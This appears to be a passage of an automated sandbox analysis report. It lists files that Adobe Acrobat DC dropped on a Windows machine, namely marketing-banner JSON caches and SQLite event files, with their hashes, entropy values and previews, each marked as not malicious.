                                                                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):294
                                                                                                Entropy (8bit):5.268083834902229
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXLgc4mSg1c2LjcWkHvR0Y/oAvJfBoTfXpnrPeUkwRe9:YvXKXrrT5LjIPcGWTfXcUkee9
                                                                                                MD5:BFEE0BE5AFE7F1224ABF57361F288D75
                                                                                                SHA1:0B07695452E5A929CDDA2E80BF12E74E25E133B3
                                                                                                SHA-256:3FC4F1F7E8598D1787C2627DF6E81AE850A683BB248D6E8767295932AC0D94D6
                                                                                                SHA-512:5FB4E05B1F967F6322B7A4DBFAF7835248356F94AE885447F5D194CBA26B5860B647E62E6BE9BCE1FA8A14B7FC6C1C1B7D960BA481E98C0B7D4C4FC06AD39D3B
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"f4a298e9-238a-44a9-aba9-a6dd24e1ecbf","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1734784257293,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):294
                                                                                                Entropy (8bit):5.247351628816899
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXLgc4mSg1c2LjcWkHvR0Y/oAvJfBD2G6UpnrPeUkwRe9:YvXKXrrT5LjIPcGR22cUkee9
                                                                                                MD5:032BD104C339867D6E33B03603151924
                                                                                                SHA1:9A06CDE3298957C9F8510FF200511C9FD4654C17
                                                                                                SHA-256:C6392207000F8892B8EB20320EDA93F17F7D8FBD38A5A84F7E610B8F95338D8F
                                                                                                SHA-512:760EB9D47C7849DC0EE6AF8CA00D62806C9102D27F89618228D0303DC0215A491D083AF6F5A766D39CCF4E1FBF4E91132BD0F0E122991A88B038E06B5EB67307
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"f4a298e9-238a-44a9-aba9-a6dd24e1ecbf","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1734784257293,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):285
                                                                                                Entropy (8bit):5.297908074118577
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXLgc4mSg1c2LjcWkHvR0Y/oAvJfPmwrPeUkwRe9:YvXKXrrT5LjIPcGH56Ukee9
                                                                                                MD5:97E5E061D84EDCA2A8E4C43F3067DD56
                                                                                                SHA1:4527BDCE4F1DECDF1088F689BFC223FCF8B27201
                                                                                                SHA-256:224B5993E1A868E3AB4E1A3D571DAB6DD1B627864AA91F6985F7FC263C0C2382
                                                                                                SHA-512:5745B20836C184F0072D58F6FD8355A6B225D95482DEFA6019B9B81F6F62DA4D9ABE7DF9F1614D8C2FE721D2E52B5D9D3DCAAD13A014FE299A96EFBC0A0E3E56
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"f4a298e9-238a-44a9-aba9-a6dd24e1ecbf","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1734784257293,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):1123
                                                                                                Entropy (8bit):5.684383362090446
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Yv6XrrT5XIxpLgE9cQx8LennAvzBvkn0RCmK8czOCCSe:YvEXMhgy6SAFv5Ah8cv/e
                                                                                                MD5:2177A32443648AE08B5F019EDF4F4EF3
                                                                                                SHA1:C4054D48A5460E575A1394CBB4990BED9284C694
                                                                                                SHA-256:ED1D91134E02D3AB4954A747CDB7FF89587E2C86FF19A4ADAD608313DD871DE1
                                                                                                SHA-512:0C482A4DE4660075830C8C0605849048EF96848A26225D65B02C83476CE39103E6D547724414690243EB9269E5711241654BCC1EF13481B9034F564C44E1373F
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"f4a298e9-238a-44a9-aba9-a6dd24e1ecbf","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1734784257293,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                                                                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):289
                                                                                                Entropy (8bit):5.26676754188296
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXLgc4mSg1c2LjcWkHvR0Y/oAvJf8dPeUkwRe9:YvXKXrrT5LjIPcGU8Ukee9
                                                                                                MD5:2F405A3B557E57F8C4F3D8A3F30892BA
                                                                                                SHA1:84F011DC26E13C7DB55880B530B791E3F3DC1A3E
                                                                                                SHA-256:82C889E455043A093C0ABAB25078CBFBA5CFBD577C1283053C8C40B453C5817D
                                                                                                SHA-512:5BCB843C073746703BDC336A4F4B19F81DD49FD464B383133D88E560DEB1D91F0F31FCF56246E47BB287587EE63F7D4B9D025DA52BCE372F353F6824048BC89F
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"f4a298e9-238a-44a9-aba9-a6dd24e1ecbf","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1734784257293,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):292
                                                                                                Entropy (8bit):5.2594459226254635
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXLgc4mSg1c2LjcWkHvR0Y/oAvJfQ1rPeUkwRe9:YvXKXrrT5LjIPcGY16Ukee9
                                                                                                MD5:286E61040642E671BB38E15264FC25D5
                                                                                                SHA1:868C51674215C22D192D19BE0501270C77962146
                                                                                                SHA-256:79FC9EA6E0E006D5BBD51D6036FE0B56992F412E17E548A03D29E68348B0484A
                                                                                                SHA-512:E6D3B6DA24E407E8C2AA1078188885B390C1DFCF3FF68FED28C525189CBEA711E394445EC6A36339ADAF71A06553BEF9D9E4D9CC0689239CD71A4CB15A46789E
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"f4a298e9-238a-44a9-aba9-a6dd24e1ecbf","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1734784257293,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):289
                                                                                                Entropy (8bit):5.274499946187661
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXLgc4mSg1c2LjcWkHvR0Y/oAvJfFldPeUkwRe9:YvXKXrrT5LjIPcGz8Ukee9
                                                                                                MD5:C711F360DC3003A36656289DF7050402
                                                                                                SHA1:30A006EE9FE0436416F409FAAF77CAA2AEE3DF13
                                                                                                SHA-256:F96DD6BB4066F335DE19573B2A7F8651F9DB9F53904B10E9A475DB62A1DD2A1F
                                                                                                SHA-512:4E30537932360F038C9A91D72DB7A878EEADBA4E19BC74EA8FBAD0165D20EEC90061CD8CF3D83126999B3BF783C42952DA110D2097A33052E747CCDA2BF07BAA
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"f4a298e9-238a-44a9-aba9-a6dd24e1ecbf","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1734784257293,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):295
                                                                                                Entropy (8bit):5.291806867715453
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXLgc4mSg1c2LjcWkHvR0Y/oAvJfzdPeUkwRe9:YvXKXrrT5LjIPcGb8Ukee9
                                                                                                MD5:E53F61B1813DBAEC0FC8CA061F418CDF
                                                                                                SHA1:70C09363C7FC0AF7FA9BB369039989EDAEFEB3BA
                                                                                                SHA-256:0F1108C87C1459724D6FC80DAFA9FDA2644F992918276F866DA7B4669E838EAF
                                                                                                SHA-512:F7F22B40009B4049158E7D4BD94D41ECA253FBA696038DB6F4C7AEE8380A7F4A3DC3D4A299F7219E5BCD0C73C59C72B00C912D599ECE4653AB56BD3B6929B049
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"f4a298e9-238a-44a9-aba9-a6dd24e1ecbf","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1734784257293,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):289
                                                                                                Entropy (8bit):5.272906345740841
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXLgc4mSg1c2LjcWkHvR0Y/oAvJfYdPeUkwRe9:YvXKXrrT5LjIPcGg8Ukee9
                                                                                                MD5:C966615F7CB6ADD32D519B1288BA8ACC
                                                                                                SHA1:EE34449119C0474A20B8F52A2E9CE3CA7CD6DA26
                                                                                                SHA-256:007B6519A7565D9132DE12C3DEDA2C95B2CBA7704E4DC36B2DEEBC597D322769
                                                                                                SHA-512:FED2974ACF6F8D8FDC5CF6483353C9C1ED353048D49E97EADCB3634B42C9F2A613FA54B82EA94181329E0373E1AAB335BCF76CCA1411838B8E06D3122E3DB604
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"f4a298e9-238a-44a9-aba9-a6dd24e1ecbf","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1734784257293,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):284
                                                                                                Entropy (8bit):5.259061071228909
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXLgc4mSg1c2LjcWkHvR0Y/oAvJf+dPeUkwRe9:YvXKXrrT5LjIPcG28Ukee9
                                                                                                MD5:28097B81E2BC8D56EB714C665EEEF3C0
                                                                                                SHA1:EFA41DC72F2EACC987BE689CD37F322675B497ED
                                                                                                SHA-256:2DAA5A3C0641298CDF321BA1A6C2161471C745854082FEE7CC8C878288E629EC
                                                                                                SHA-512:A3E8269932829A0C2ED15A01451A1A0E999CE45795C363B0F5C2E9C418E5B13862FEFC9E81BC2D4007AF816D084D63F41E9B62C4E03739C06649A8372CAB4F29
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"f4a298e9-238a-44a9-aba9-a6dd24e1ecbf","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1734784257293,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):291
                                                                                                Entropy (8bit):5.2566396540969
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXLgc4mSg1c2LjcWkHvR0Y/oAvJfbPtdPeUkwRe9:YvXKXrrT5LjIPcGDV8Ukee9
                                                                                                MD5:66B48E9B916FA14753A238DB8ABE6F73
                                                                                                SHA1:1C8AC911246A87A96EE9A8B4DAE319699C4B104B
                                                                                                SHA-256:C7FA0F9E4010035F5527BDD4E7F9E0D02AA656B71842C54095EA1B2514B911A2
                                                                                                SHA-512:A1E07B199F105BB541B447D660AA80C3404A692E5E6E1B76F8370F69D6E66733A8A20F3850460E2A3F453A6FCD8545A577073C05324C94D4DBC52BA305686F67
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"f4a298e9-238a-44a9-aba9-a6dd24e1ecbf","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1734784257293,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):287
                                                                                                Entropy (8bit):5.249430359104576
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXLgc4mSg1c2LjcWkHvR0Y/oAvJf21rPeUkwRe9:YvXKXrrT5LjIPcG+16Ukee9
                                                                                                MD5:2921BFCB1BB772FC079ED839A002C416
                                                                                                SHA1:0C7A2C7D005CFC9A45212B25CDB1222289DEB667
                                                                                                SHA-256:3CB6665310EAFC9FB99A3ACCFBB164F5D78E65956AE734002E03B121D2C55C1D
                                                                                                SHA-512:013725DE14C4AF95DE46FDB5FEC16D733D403E127DD3FABD960B7AAC3BF416F0E9CDA87A501FF8B95DA69B07B9F4D17C79D6F89BD5CCD6876207554BB2681C0B
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"f4a298e9-238a-44a9-aba9-a6dd24e1ecbf","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1734784257293,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):1090
                                                                                                Entropy (8bit):5.661940334548066
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Yv6XrrT5XIRamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSe:YvEX+BgkDMUJUAh8cvMe
                                                                                                MD5:10565DDB427F4487A4CCFE58AA67426A
                                                                                                SHA1:7D38097E0AD760757B758C3413737C502F26A005
                                                                                                SHA-256:EC2A3E6FB885F4A31D12CE6CB0944E9A88B86643AC01DA84120C329973570C15
                                                                                                SHA-512:A968A4114B639AF2EACA16D0CD255A4E279672B6D56FE0A6DF1710F37FD691932745CA7D477314F9863FD55737F6840B13D1FBFA4E5FEB89E64865AA5279A0BF
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"f4a298e9-238a-44a9-aba9-a6dd24e1ecbf","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1734784257293,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                                                                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):286
                                                                                                Entropy (8bit):5.2222609294157465
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXLgc4mSg1c2LjcWkHvR0Y/oAvJfshHHrPeUkwRe9:YvXKXrrT5LjIPcGUUUkee9
                                                                                                MD5:25A805D1E817B293A10C300DA45D8B29
                                                                                                SHA1:098FEE562BCE2D3E12051FE0B9D3805C183302F0
                                                                                                SHA-256:633033084B3E30EF13D3B8D65AFF0D09A54B5D8A152CFD99DDAF80D065EC8761
                                                                                                SHA-512:5B6FE7A7B6B954574370C56D214974045A851DEAA6C35FECE0661F70421B4F15014002CAC98FA7DD4E955EE4E0AC52B8E613AB122E0B322218EFF26C4D5D9175
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"f4a298e9-238a-44a9-aba9-a6dd24e1ecbf","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1734784257293,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):282
                                                                                                Entropy (8bit):5.233171337305971
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXLgc4mSg1c2LjcWkHvR0Y/oAvJTqgFCrPeUkwRe9:YvXKXrrT5LjIPcGTq16Ukee9
                                                                                                MD5:3600F68F42B07E6ED7A5FA450B369B72
                                                                                                SHA1:EFA4D148F19048524D29F3EE6FEE1390E24ACF35
                                                                                                SHA-256:F43FF78620B4A5379E7D18988605B937E5E0EA32574BF826EB6E65A2A173E0DE
                                                                                                SHA-512:4EC0BB2763CAC0D7049E07B810521077469BEE9149612594473AEE975E7ED1C6FE321305840DDA0791490D10E4345F6E5B4AE1FAA1DEB0534E35CE3368B93095
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"f4a298e9-238a-44a9-aba9-a6dd24e1ecbf","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1734784257293,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):4
                                                                                                Entropy (8bit):0.8112781244591328
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:e:e
                                                                                                MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                Malicious:false
                                                                                                Preview:....

                                                                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):2814
                                                                                                Entropy (8bit):5.133837850667915
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:YMqhTJaJaydngJzZJ3hWxzNAJG0Ljgesj0SZNVCx2aIP2LS7CF8qFNtEF0W4q5B1:YMqhJTrQHoN+ZKKPJ9qbtEFxqh95u
                                                                                                MD5:0962D1EDEE30F21DC2E78CB1AD660EF0
                                                                                                SHA1:A55F997F445F300B0DEAAF7839A97F1D7F539018
                                                                                                SHA-256:21B3871ED6C7837D1593A5BF4B656D7DA8F428E76909FD472D776F80499EE32F
                                                                                                SHA-512:E65DE9D5864DA0E4C030B1088976D111028C5F3CF0307B024D73826F6F0E5158A441382BF1D0131AFDDC682EFCC52AAC0998FE21DA17CEF36EC4EE3D8EAA7705
                                                                                                Malicious:false
                                                                                                Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"54f955066030c1e2c1b242494cfed9cb","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734609071000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"34512f665de98a6f92331688ea8910e8","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734609071000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"d99db3ac41cb261a6d31a59b8c1b04de","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734609071000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"383b67b35931cbf10fca0f385fb6107c","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734609071000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"d6704454a9cb23ced290fdc4912dde9c","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734609071000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"2a4f20848be7ed522f070d379f7102bb","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

                                                                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 26, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 26
                                                                                                Category:dropped
                                                                                                Size (bytes):12288
                                                                                                Entropy (8bit):1.3657323553311085
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:TLBx/XYKQvGJF7urs9S6bqyKn6ylSTofcNqDuYcXKdqEKfS8EKfM1bawcF:Tll2GL7msMcKTlS8fcsuYzfIww
                                                                                                MD5:3F63C42E28B346BF1C85CEC8F01617BC
                                                                                                SHA1:01CFC8405E07C4A06F268A81C8A3096AB8591F32
                                                                                                SHA-256:4DB617D26569BCCCD97F8C6AFFED23CF6E1B56B96780AFD899D92A7AD46DD4C4
                                                                                                SHA-512:C10B55BD3A9388728C496AAF3CA4A97FDEE6D9F7B3586BD871F4B7E88DAED86C3DDA4DF26273DC903D97858E788CC6F7D463385FA394509A74E3540DD530EFAC
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:SQLite Rollback Journal
                                                                                                Category:dropped
                                                                                                Size (bytes):8720
                                                                                                Entropy (8bit):1.84158576561457
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:7+tGZ6bqyKn6ylSTofcNqDuYc+KdqEKfS8EKfM1banbq0qLKufx/XYKQvGJF7ur3:7MccKTlS8fcsuYWfIxqGufl2GL7msW
                                                                                                MD5:DD0C1FE229F85D2841C99D1486A46766
                                                                                                SHA1:1E880230F819442C275E859E9B7FC6429AD3CE49
                                                                                                SHA-256:29C5D99699F7F303231BB0A1295E83891E3DED5592476E5CF6E999173AB1F39B
                                                                                                SHA-512:23E7964477311A63EEE313E72BC072ED4059619B429EAB7FDDB5B93AC6E95FE19972801A661A9263112D301467061A45388F1A9E74A4C18EB49BE0E757AE377C
                                                                                                Malicious:false
                                                                                                Preview:.... .c......{@X..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^..^.^.^.^.^.^.^.-.-.-.-.-.-.-.-.-.-.-........................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):66726
                                                                                                Entropy (8bit):5.392739213842091
                                                                                                Encrypted:false
